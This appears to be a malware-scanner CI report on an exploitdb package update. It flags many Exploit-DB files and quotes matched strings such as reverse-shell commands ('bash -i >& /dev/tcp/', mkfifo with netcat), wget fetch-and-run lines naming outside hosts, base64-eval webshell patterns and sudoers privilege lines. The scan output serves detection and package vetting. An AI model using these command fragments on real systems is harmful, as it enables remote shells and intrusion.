exploitdb/2025.03.20 package update #47498
Closed
Octo STS / ci-mal-report (STAGING)
completed
Mar 20, 2025 in 51s
malcontent scan complete
Details
❌ x86_64/exploitdb-2025.03.20-r0.apk
usr/share/app/exploitdb/exploits/asp/webapps/20035.js
(CRITICAL)
- Detects payload generated by exe2hex
- echo r cx >>
- echo 4d 5a
usr/share/app/exploitdb/exploits/aspx/webapps/47010.py
(CRITICAL)
- Detects CobaltStrike C2 host artifacts
- #Host:
usr/share/app/exploitdb/exploits/aspx/webapps/47011.py
(CRITICAL)
- Detects CobaltStrike C2 host artifacts
- #Host:
usr/share/app/exploitdb/exploits/aspx/webapps/47014.py
(CRITICAL)
- Detects CobaltStrike C2 host artifacts
- #Host:
usr/share/app/exploitdb/exploits/bsd/dos/869.c
(CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/bsd/local/1087.c
(CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/cgi/remote/34777.rb
(CRITICAL)
- Detects a group of strings often used in exploit codes
- Exploit
- Payload
- CVE-201
usr/share/app/exploitdb/exploits/cgi/remote/37426.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/cgi/webapps/1508.pl
(CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/cgi/webapps/35383.rb
(CRITICAL)
- executes base64 encoded shell commands
- base64 --decode|sh
usr/share/app/exploitdb/exploits/cgi/webapps/35384.rb
(CRITICAL)
- executes base64 encoded shell commands
- base64 --decode|sh
usr/share/app/exploitdb/exploits/cgi/webapps/40462.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/39568.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/40619.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/42726.py
(CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/hardware/remote/42888.sh
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/remote/43609.py
(CRITICAL)
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- base64_decode
- preg_replace
- explode
- exec(
- eval
- Executes code from a remote source
- base64_decode($_SERVER
- eval(base64_decode
usr/share/app/exploitdb/exploits/hardware/remote/44253.py
(CRITICAL)
- fetches, chmods, and runs a program
- wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a
usr/share/app/exploitdb/exploits/hardware/remote/44635.py
(CRITICAL)
- Installs socket library using pip
- pip install websocket
usr/share/app/exploitdb/exploits/hardware/remote/47888.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/remote/50856.py
(CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/hardware/remote/51677.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/remote/51852.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/remote/51853.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/webapps/36202.py
(CRITICAL)
- Executes code from a remote source
- system($_POST
usr/share/app/exploitdb/exploits/hardware/webapps/40284.txt
(CRITICAL)
- PHP webshell which eval()s obfuscated string
- preg_replace("/{FILE_PATH}/", '/e
- Exploit
- pack
usr/share/app/exploitdb/exploits/hardware/webapps/42785.sh
(CRITICAL)
- PHP code that references hash-bangs and remotely supplied content
- #!/bin/
- $_GET
usr/share/app/exploitdb/exploits/hardware/webapps/45602.py
(CRITICAL)
- PHP webshell obfuscated
- shell_exec("
- system('
- \x3
usr/share/app/exploitdb/exploits/hardware/webapps/47627.py
(CRITICAL)
- Executes encoded character content
- exec(chr(0)[0
usr/share/app/exploitdb/exploits/hardware/webapps/48835.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/webapps/49110.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/hardware/webapps/49436.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/hardware/webapps/49499.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/java/remote/50592.py
(CRITICAL)
- Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228
- ${jndi:ldap:/
usr/share/app/exploitdb/exploits/java/webapps/43114.py
(CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%@
- %>
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/java/webapps/46453.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/java/webapps/47895.py
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/java/webapps/50178.sh
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/jsp/webapps/16274.pl
(CRITICAL)
- JSP uploader which gets input, writes files and contains "upload"
- FileOutputStream
- getInputStream
- request
- UPLOAD
- <%
- %>
usr/share/app/exploitdb/exploits/jsp/webapps/17924.pl
(CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%@
- %>
- Web Shell - file cmd.jsp
- out.println("Command: " + request.getParameter("cmd") + "
");
- out.println("Command: " + request.getParameter("cmd") + "
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/jsp/webapps/46967.py
(CRITICAL)
- Strings from the ver.jsp webshell
- out.print((char)c);}in.close()
usr/share/app/exploitdb/exploits/jsp/webapps/47180.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/jsp/webapps/51991.py
(CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%
- %>
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/linux/dos/44264.c
(CRITICAL)
- Detects Linux Trojan Tsunami (Linux.Trojan.Tsunami)
- <reflection
usr/share/app/exploitdb/exploits/linux/local/14814.c
(CRITICAL)
- Detects Linux Exploit Perl (Linux.Exploit.Perl)
- seeking out the sma
usr/share/app/exploitdb/exploits/linux/local/203.sh
(CRITICAL)
- persists via a hidden crontab entry
- /tmp/.rootcron
- crontab
usr/share/app/exploitdb/exploits/linux/local/21258.bat
(CRITICAL)
- Standard AV test, checking for an EICAR substring
- $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!
usr/share/app/exploitdb/exploits/linux/local/25444.c
(CRITICAL)
- Detects Linux Exploit Intfour (Linux.Exploit.Intfour)
- m(code, 1024, &needle
usr/share/app/exploitdb/exploits/linux/local/35161.c
(CRITICAL)
- Sample from CN Honker Pentest Toolset - file mempodipper2.6.39
- objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed
usr/share/app/exploitdb/exploits/linux/local/39702.rb
(CRITICAL)
- Detects a group of strings often used in exploit codes
- Exploit
- Payload
- CVE-201
usr/share/app/exploitdb/exploits/linux/local/40679.sh
(CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40688.rb
(CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40759.rb
(CRITICAL)
- Detects Linux Exploit Cve 2016 4557 (Linux.Exploit.CVE-2016-4557)
- . if this worked, yo
usr/share/app/exploitdb/exploits/linux/local/40768.sh
(CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40774.sh
(CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40810.c
(CRITICAL)
- Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)
- ve: Linux 2.6.
usr/share/app/exploitdb/exploits/linux/local/40921.sh
(CRITICAL)
- Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group
- rm -f /etc/ld.so.preload
usr/share/app/exploitdb/exploits/linux/local/40938.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/linux/local/41994.c
(CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/43418.c
(CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/47168.c
(CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/47169.c
(CRITICAL)
- Detects Linux Exploit Cve 2017 100011 (Linux.Exploit.CVE-2017-100011)
- ] done, kernel text:
usr/share/app/exploitdb/exploits/linux/local/50808.c
(CRITICAL)
- Detects Linux Exploit Cve 2022 0847 (Linux.Exploit.CVE-2022-0847)
- hijacking suid binary
- Usage: %s SUID
- splice failed
- prepare_pipe
- short splice
- short write
usr/share/app/exploitdb/exploits/linux/local/50911.py
(CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- '>&
usr/share/app/exploitdb/exploits/linux/local/51934.sh
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/1247.pl
(CRITICAL)
- Semi-Auto-generated - file sql.php.php.txt
usr/share/app/exploitdb/exploits/linux/remote/1258.php
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- $path[strlen($
- "upload"
- exploit
- Exploit
- bypass
usr/share/app/exploitdb/exploits/linux/remote/13853.pl
(CRITICAL)
- fetches, chmods, and runs a program
- wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell
- wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot
usr/share/app/exploitdb/exploits/linux/remote/15725.pl
(CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/remote/16311.rb
(CRITICAL)
- Detects Linux Exploit Perl (Linux.Exploit.Perl)
- Tue Sep 21 16:48:12
usr/share/app/exploitdb/exploits/linux/remote/25970.py
(CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/remote/34595.py
(CRITICAL)
- Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness.
- |base64 -
- whoami
- /tmp
usr/share/app/exploitdb/exploits/linux/remote/348.c
(CRITICAL)
- Detects Linux Exploit Perl (Linux.Exploit.Perl)
- Tue Sep 21 16:48:12
usr/share/app/exploitdb/exploits/linux/remote/34860.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/34900.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/35581.rb
(CRITICAL)
- References a 'backd00r'
- backd00r HTTP
usr/share/app/exploitdb/exploits/linux/remote/36933.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/37262.rb
(CRITICAL)
- Executes code from a remote source
- passthru($_GET
usr/share/app/exploitdb/exploits/linux/remote/40232.py
(CRITICAL)
- executes base64 encoded shell commands
- base64 -d | sh
usr/share/app/exploitdb/exploits/linux/remote/41785.rb
(CRITICAL)
- executes base64 encoded shell commands
- base64 -d|sh
usr/share/app/exploitdb/exploits/linux/remote/42957.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/42958.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/44297.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/44571.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/45914.rb
(CRITICAL)
- executes base64 encoded shell commands
- base64 -d|bash
usr/share/app/exploitdb/exploits/linux/remote/47039.rb
(CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/linux/remote/47358.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/linux/remote/48170.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/48353.rb
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- exploit
- Exploit
- bypass
- Bypass
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- eval(base64_decode
usr/share/app/exploitdb/exploits/linux/remote/50347.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/remote/5224.php
(CRITICAL)
- php webshell containing base64 encoded payload
- base64_decode
- V4ZWN1
- ZXhlY3
- ZXZhb
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- References multiple PHP functions in base64 form
- base64_php_functions_multiple::base64_decode
- base64_php_functions_multiple::Zm9yZWFja
- base64_php_functions_multiple::ZvcmVhY2
- base64_php_functions_multiple::dW5saW5r
- base64_php_functions_multiple::N0cmxlb
- base64_php_functions_multiple::<?php
- base64_php_functions_multiple::ZXhlY
- base64_php_functions_multiple::V4ZW
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- base64_decode($_SERVER
- eval(base64_decode
usr/share/app/exploitdb/exploits/linux/webapps/18932.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
- PHP webshell which eval()s obfuscated string
- base64_decode
- shell_exec(b
- Exploit
- hardcoded /dev/tcp host:port
- /dev/tcp/172.16.164.1/1234
- Executes code from a remote source
- shell_exec(base64_decode
usr/share/app/exploitdb/exploits/linux/webapps/20064.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
- PHP webshell which eval()s obfuscated string
- base64_decode
- shell_exec(b
- Exploit
- Executes code from a remote source
- shell_exec(base64_decode
usr/share/app/exploitdb/exploits/linux/webapps/41628.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/webapps/41976.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/webapps/42149.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/linux/webapps/42187.py
(CRITICAL)
- Decodes and evaluates code
- base64_decode
- preg_replace
- explode
- exec(
- eval
usr/share/app/exploitdb/exploits/linux/webapps/45542.py
(CRITICAL)
- executes base64 encoded shell commands
- base64 -d | bash
usr/share/app/exploitdb/exploits/linux/webapps/45852.py
(CRITICAL)
- JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.
- Runtime.getRuntime().exec(request.getParameter(
- <%@
- %>
- Looks for a common design pattern in webshells where a request attribute is passed directly to exec().
- Runtime.getRuntime().exec(request.
usr/share/app/exploitdb/exploits/linux/webapps/46221.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/linux/webapps/48519.py
(CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/linux/webapps/49735.py
(CRITICAL)
- Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp
- sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
- osw = new BufferedWriter(new OutputStreamWriter(os));
- isr = new BufferedReader(new InputStreamReader(is));
usr/share/app/exploitdb/exploits/linux/webapps/50144.py
(CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/webapps/50234.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/linux/webapps/50809.py
(CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/linux/webapps/51797.py
(CRITICAL)
- References shell script within /dev/shm (world writeable)
- /dev/shm/exec.sh
usr/share/app/exploitdb/exploits/linux_x86-64/local/33589.c
(CRITICAL)
- Detects Linux Exploit Intfour (Linux.Exploit.Intfour)
- m(code, 1024, &needle
usr/share/app/exploitdb/exploits/linux_x86/dos/36741.py
(CRITICAL)
- Identifies Impacket, a collection of Python classes for working with network protocols.
- impacket.dcerpc
- impacket.nmb
usr/share/app/exploitdb/exploits/macos/local/45782.c
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/dos/4856.php
(CRITICAL)
- Performs DDoS (distributed denial of service) attacks
- TSource Engine Query
usr/share/app/exploitdb/exploits/multiple/dos/5679.php
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- exploit
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- PHP webshell which eval()s obfuscated string
- base64_decode
- exploit
- eval(b
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- eval(base64_decode
usr/share/app/exploitdb/exploits/multiple/local/46727.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/local/49491.py
(CRITICAL)
- executes base64 encoded shell commands
- base64 -d | sh
usr/share/app/exploitdb/exploits/multiple/remote/10.c
(CRITICAL)
- Equation Group hack tool leaked by ShadowBrokers- file sambal
- connecting back to: [%d.%d.%d.%d:45295]
- Exploit failed, try -b to bruteforce.
- Usage: %s [-bBcCdfprsStv] [host]
- Host is not running samba!
- Bruteforce mode.
usr/share/app/exploitdb/exploits/multiple/remote/18245.py
(CRITICAL)
- reverse shell in Perl
- socket(
- open(
- sh -i
- ">&
usr/share/app/exploitdb/exploits/multiple/remote/19420.c
(CRITICAL)
- Equation Group hack tool leaked by ShadowBrokers- file cmsd
- usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]
- port=%d connected!
- xxx.XXXXXX
usr/share/app/exploitdb/exploits/multiple/remote/21080.rb
(CRITICAL)
- JSP uploader which gets input, writes files and contains "upload"
- FileOutputStream
- getParameter
- request
- upload
- Upload
- <%@p
- %>
usr/share/app/exploitdb/exploits/multiple/remote/21339.c
(CRITICAL)
- Standard AV test, checking for an EICAR substring
- $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!
usr/share/app/exploitdb/exploits/multiple/remote/35441.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
- Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness.
- && chmod +x
- |base64 -
- /tmp
usr/share/app/exploitdb/exploits/multiple/remote/40824.py
(CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/multiple/remote/46628.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/46814.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/47698.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/48338.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/48508.rb
(CRITICAL)
- Detects strings found in Runspace Post Exploitation Toolkit
- windows/meterpreter
usr/share/app/exploitdb/exploits/multiple/remote/49067.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/multiple/remote/50932.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/41685.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/multiple/webapps/41688.rb
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- backdoor
- exploit
- Exploit
- hacker
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
- Executes code from a remote source
- eval(base64_decode
usr/share/app/exploitdb/exploits/multiple/webapps/42884.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/46773.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/47364.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/47901.sh
(CRITICAL)
- Detects payloads used in Shitrix exploitation CVE-2019-19781
- tee /netscaler/portal/templates/
- template.new({'BLOCK'%3d
- pwnpzi1337
- NSC_NONCE:
- NSC_USER:
- /../
usr/share/app/exploitdb/exploits/multiple/webapps/47902.py
(CRITICAL)
- Detects payloads used in Shitrix exploitation CVE-2019-19781
- template.new({'BLOCK'='print readpipe(
- /../
usr/share/app/exploitdb/exploits/multiple/webapps/47913.rb
(CRITICAL)
- Detects payloads used in Shitrix exploitation CVE-2019-19781
- template.new({'BLOCK'='print readpipe(
- /../
usr/share/app/exploitdb/exploits/multiple/webapps/48804.py
(CRITICAL)
- Executes code from a remote source
- system($_GET
usr/share/app/exploitdb/exploits/multiple/webapps/49571.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/multiple/webapps/49885.py
(CRITICAL)
- Find .csv file exploiting DDE technique
- =cmd|
usr/share/app/exploitdb/exploits/multiple/webapps/50230.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/multiple/webapps/50233.py
(CRITICAL)
- creates a reverse shell using mkfifo and netcat
- mkfifo
- sh -i
- |nc
usr/share/app/exploitdb/exploits/multiple/webapps/51452.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/nodejs/webapps/49552.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/osx/local/27965.py
(CRITICAL)
- Detects susupicious bash command
- bash -i >& /dev/tcp/
usr/share/app/exploitdb/exploits/osx/local/38371.py
(CRITICAL)
- No description has been set in the source file - BinaryAlert
- ALL ALL=(ALL) NOPASSWD: ALL
- root echo
- /etc/sudoers
- /etc/crontab
- /usr/bin/rsh
- localhost
usr/share/app/exploitdb/exploits/osx/local/38540.rb
(CRITICAL)
- No description has been set in the source file - BinaryAlert
- ALL ALL=(ALL) NOPASSWD: ALL
- root echo
- /etc/crontab
- /etc/sudoers
- /usr/bin/rsh
- localhost
usr/share/app/exploitdb/exploits/php/dos/10243.py
(CRITICAL)
- Executes code from a remote source
- eval($_REQUEST
usr/share/app/exploitdb/exploits/php/dos/1345.php
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- $path[strlen($
- str_replace
- exploit
- Exploit
usr/share/app/exploitdb/exploits/php/dos/1573.php
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- $path[strlen($
- str_replace
- exploit
- Exploit
- ++;$
usr/share/app/exploitdb/exploits/php/local/32901.php
(CRITICAL)
- php webshell containing base64 encoded payload
- base64_decode
- leGVj
- References multiple PHP functions in base64 form
- base64_php_functions_multiple::Y3VybF9zZXRvcH
- base64_php_functions_multiple::base64_decode
- base64_php_functions_multiple::Y3VybF9leGVj
- base64_php_functions_multiple::ZXhwbG9kZ
- base64_php_functions_multiple::VtcHR5
- base64_php_functions_multiple::ZW1wdH
- base64_php_functions_multiple::<?php
- base64_php_functions_multiple::leGVj
usr/share/app/exploitdb/exploits/php/remote/18898.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/23006.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/24444.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/25137.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/26622.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/27941.rb
(CRITICAL)
- PHP webshell which directly eval()s obfuscated string
- eval(base64_decode(
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/29325.rb
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- $functionName ($
- exploit
- Exploit
- shell_
usr/share/app/exploitdb/exploits/php/remote/30928.php
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- $Target[strlen($
- exploit
- Exploit
usr/share/app/exploitdb/exploits/php/remote/32439.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/34160.py
(CRITICAL)
- Executes code from a remote source
- passthru($_GET
usr/share/app/exploitdb/exploits/php/remote/34191.py
(CRITICAL)
- Executes code from a remote source
- passthru($_GET
usr/share/app/exploitdb/exploits/php/remote/34390.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/35183.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/35283.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/35545.rb
(CRITICAL)
- directly evaluates base64 content
- php_eval_base64_decode::eval(base64_decode
usr/share/app/exploitdb/exploits/php/remote/36264.rb
(CRITICAL)
- PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
- unlink(FILE)
- exploit
- Exploit
- eval(
- ase6
- PHP webshell which directly eval()s obfuscated string
- e